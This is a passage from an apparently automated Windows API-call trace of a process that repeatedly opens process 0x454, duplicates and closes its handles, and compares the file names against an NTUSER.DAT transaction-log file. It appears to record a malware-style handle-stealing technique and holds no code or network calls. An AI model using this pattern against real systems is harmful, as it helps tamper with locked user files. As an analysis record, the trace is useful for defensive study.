(dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.860] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.861] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.862] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.862] CloseHandle (hObject=0x670) returned 1 [0153.862] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.862] CloseHandle (hObject=0x680) returned 1 [0153.862] CloseHandle (hObject=0x62c) returned 1 [0153.862] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.862] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.863] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.864] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.864] CloseHandle (hObject=0x670) returned 1 [0153.865] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.865] CloseHandle (hObject=0x680) returned 1 [0153.865] CloseHandle (hObject=0x62c) returned 1 [0153.865] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.865] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.865] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.866] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.866] CloseHandle (hObject=0x670) returned 1 [0153.866] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.866] CloseHandle (hObject=0x680) returned 1 [0153.866] CloseHandle (hObject=0x62c) returned 1 [0153.866] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.866] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.866] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.867] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.868] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.868] CloseHandle (hObject=0x670) returned 1 [0153.868] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.868] CloseHandle (hObject=0x680) returned 1 [0153.868] CloseHandle (hObject=0x62c) returned 1 [0153.868] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.868] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.868] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.869] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.869] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.869] CloseHandle (hObject=0x670) returned 1 [0153.869] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.869] CloseHandle (hObject=0x680) returned 1 [0153.869] CloseHandle (hObject=0x62c) returned 1 [0153.869] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.869] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.869] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.870] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.871] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.871] CloseHandle (hObject=0x670) returned 1 [0153.871] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.871] CloseHandle (hObject=0x680) returned 1 [0153.871] CloseHandle (hObject=0x62c) returned 1 [0153.871] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.871] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.872] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.872] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.872] CloseHandle (hObject=0x670) returned 1 [0153.872] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.872] CloseHandle (hObject=0x680) returned 1 [0153.872] CloseHandle (hObject=0x62c) returned 1 [0153.873] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.873] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.873] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.874] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.874] CloseHandle (hObject=0x670) returned 1 [0153.874] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.874] CloseHandle (hObject=0x680) returned 1 [0153.874] CloseHandle (hObject=0x62c) returned 1 [0153.874] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.874] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.875] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.875] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.875] CloseHandle (hObject=0x670) returned 1 [0153.876] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.876] CloseHandle (hObject=0x680) returned 1 [0153.876] CloseHandle (hObject=0x62c) returned 1 [0153.876] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.876] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.876] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.877] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.877] CloseHandle (hObject=0x670) returned 1 [0153.877] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.877] CloseHandle (hObject=0x680) returned 1 [0153.877] CloseHandle (hObject=0x62c) returned 1 [0153.877] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.877] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.878] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.879] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.879] CloseHandle (hObject=0x670) returned 1 [0153.879] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.879] CloseHandle (hObject=0x680) returned 1 [0153.879] CloseHandle (hObject=0x62c) returned 1 [0153.879] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.879] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.880] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.881] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.881] CloseHandle (hObject=0x670) returned 1 [0153.881] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.881] CloseHandle (hObject=0x680) returned 1 [0153.881] CloseHandle (hObject=0x62c) returned 1 [0153.881] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.881] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.882] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.882] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.882] CloseHandle (hObject=0x670) returned 1 [0153.882] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0153.882] CloseHandle (hObject=0x680) returned 1 [0153.882] CloseHandle (hObject=0x62c) returned 1 [0153.883] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.883] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.883] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.884] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.885] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.885] CloseHandle (hObject=0x670) returned 1 [0153.885] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.885] CloseHandle (hObject=0x680) returned 1 [0153.886] CloseHandle (hObject=0x62c) returned 1 [0153.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.886] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.886] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.887] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.887] CloseHandle (hObject=0x670) returned 1 [0153.887] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.887] CloseHandle (hObject=0x680) returned 1 [0153.887] CloseHandle (hObject=0x62c) returned 1 [0153.887] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.887] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.887] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.888] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.888] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.888] CloseHandle (hObject=0x670) returned 1 [0153.888] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.889] CloseHandle (hObject=0x680) returned 1 [0153.889] CloseHandle (hObject=0x62c) returned 1 [0153.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.889] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.889] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.890] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.890] CloseHandle (hObject=0x670) returned 1 [0153.890] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0153.890] CloseHandle (hObject=0x680) returned 1 [0153.890] CloseHandle (hObject=0x62c) returned 1 [0153.890] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.890] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.891] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.891] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.892] CloseHandle (hObject=0x670) returned 1 [0153.892] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.892] CloseHandle (hObject=0x680) returned 1 [0153.892] CloseHandle (hObject=0x62c) returned 1 [0153.892] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.892] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.893] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.893] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.894] CloseHandle (hObject=0x670) returned 1 [0153.894] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.894] CloseHandle (hObject=0x680) returned 1 [0153.894] CloseHandle (hObject=0x62c) returned 1 [0153.894] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.894] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.895] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.896] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.896] CloseHandle (hObject=0x670) returned 1 [0153.896] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.896] CloseHandle (hObject=0x680) returned 1 [0153.896] CloseHandle (hObject=0x62c) returned 1 [0153.896] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.896] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.897] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.897] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.897] CloseHandle (hObject=0x670) returned 1 [0153.897] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.897] CloseHandle (hObject=0x680) returned 1 [0153.898] CloseHandle (hObject=0x62c) returned 1 [0153.898] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.898] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.898] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.899] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.899] CloseHandle (hObject=0x670) returned 1 [0153.899] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0153.899] CloseHandle (hObject=0x680) returned 1 [0153.899] CloseHandle (hObject=0x62c) returned 1 [0153.899] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.899] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.900] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.901] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.901] CloseHandle (hObject=0x670) returned 1 [0153.901] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0153.901] CloseHandle (hObject=0x680) returned 1 [0153.901] CloseHandle (hObject=0x62c) returned 1 [0153.901] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.901] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.902] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.902] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.902] CloseHandle (hObject=0x670) returned 1 [0153.902] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0153.902] CloseHandle (hObject=0x680) returned 1 [0153.902] CloseHandle (hObject=0x62c) returned 1 [0153.903] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.903] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, 